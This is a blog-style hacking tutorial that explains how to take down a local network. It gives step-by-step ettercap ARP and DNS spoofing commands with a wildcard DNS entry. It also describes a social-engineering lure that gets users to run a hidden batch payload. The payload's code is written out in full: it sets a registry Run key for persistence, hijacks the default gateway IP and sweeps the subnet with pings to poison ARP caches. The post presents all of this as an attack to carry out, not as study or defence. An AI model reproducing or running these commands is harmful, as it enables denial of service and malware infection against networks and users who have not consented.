This time I am going to share some of my experience of bringing down network which I have done many time. Their are some process I have used to bring down the network. These are few general process which we use in hacking, but using them you can bring down a network also.
Bringing down a network requires knowledge of networking concept e.g. ARP, Default Gateway, MAC Address, DNS and few more. In both the process we will be using Backtrack. First Process will bring down network temporary without using any type of virus, worms etc. It will stop Internet Access but all the network access will be running. In second Process we will use our own Payload to bring down the internet and LAN connectivity in network. Whenever a user will try to access any website then the browser will download the payload and will ask user to run it. If user run it as administrator then that PC will not be able to connect to the internet or LAN.
First Process
Well this Process is nothing but just DNS Poisoning using ETTERCAP. We use this attack to do MITM Attack, but in this case we will use to block a website or to bring down a network. I think you all know what ettercap is and how to do DNS Poisoning using it. I have already Explain how to do it with tab-nabbing in my previous post. I will explain it here also. If you are using this process then network will be down as long as your PC is power on, once you shutdown your PC this Attack will stop and network will start running in few minute.
First of all you must be connected to the network with your Backtrack Machine or you can connect using your Windows Machine and run Backtrack using Virtual-Box. If you are running backtrack using Virtual-Box then make sure to put you interface in Bridge mode, So that your virtual box will get connected to the network directly ( I am not going to explain it how to do it, Just google it).
Ok now let start DNS Poisoning on the network.
Step 1:) Install ettercap (as root )
# apt-get -y install ettercap
Step 2:) Then enable IP forwarding
# echo 1 > /proc/sys/net/ipv4/ip_forward
Step 3:) Then locate etter.dns file
You may find more then one etter.dns select the one I have selected in the Pic.
# locate etter.dns
Step 4:) Open the file and add entry at the end of the file
# nano /usr/local/share/ettercap/etter.dns
Now add the entry at the end of the file
www.url-of-websitet-to-block.com A your ip address
Generally we add the Name of website we want to block. But in this case we want to bring down the network so that Internet won’t work. So will add all the website using asterisk (*). To do that add
*.*.* A ip_address
you can add IP address of your or any other IP address, make sure the IP address you are adding does not exist or does not have web server running or it.
Step 5:) Now start the spoofing
# ettercap -T -q -M arp:remote -P dns_spoof //
After this the network will be down because all the PC which are connected in LAN think that you are the DNS of the network and will send all the DNS query to you, and we have already define the IP address of all the website to your IP address so whenever a user will try to open any website then the traffic will be redirected to your PC.
Second Process
Second Process is based on First Process. In this attack we create a payload and then upload it on our web-server (can be localhost). We also do DNS Spoofing on the network which is our first process as discussed above. After doing DNS spoofing all the traffic will be redirect on your PC and will open website hosted on your PC. We will host a website which have auto download feature or by any mean make victim to download the payload and make him/her run it (You can give messages like your browser doesn't have supported plugin to download click here. Run it as Administrator... etc..) Once the user run that payload the network will be down as long as that victim is connected to network. If all the PC in network are running that payload then network will be down forever.
We will create the payload in batch programming. If you don't know how to create batch file click here. You need to convert that into .exe extension from .bat extension (use QBFC) and convert it as ghost application. Ghost application run in background so victim will net get any idea of it.
Batch Code for Payload:-
Copy the following line(red lines) in a batch file.
@echo off
We will copy this file to some safe location.
copy <name of your File> <New Location of your file>
We will add it to startup programe.
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run /v Payload /t reg_sz /d <New Location of your Batch File>
Once the file has been added to the startup that file will start by default.
Now the file has been added to the startup we can launch attack on the network!!!
Change the ip address of victim PC to default gateway of the network..
netsh int ip set address "local area connection" static 192.168.0.1 255.255.255.0
Give the name of interface as "Local area Connection" or if you are using wifi give "Wireless Network Connection".Victim will be using either wireless or wired.
Now few of the victims are using ip address of default gateway.( only few of the PC in network will be running the payload not all, because it is possible that few are shutdown or may be few didn't run that payload or can be any reason.). We will ping the entire network using that victim so that arp of all PC in network will be poisoined everytime victim start the PC. As multiple PCs are running payload you attach will be launched by multiple PC. Your PC can be removed from the network once few of the PC are running the payload. Ok now lets ping the entire network.
set a=192.168.0 # network part of your Network
set b=1 # starting host part of the network
:start #break point
ping %a.%b -n 1 #we are going to ping all the network using this. Function n is used to specify the count of ping request
set /a b = %b%+1 #increase the value of b so that we can ping next PC
if %b%==255 set b=1 #to check the value of b if it exceed the max limit of IP address, Give the limit as per your requirement.
goto start #Restart the attack.
Run it on your own risk.
These are just process which I have used to bring down few network.
If you have any doubt then please comment....
No comments:
Post a Comment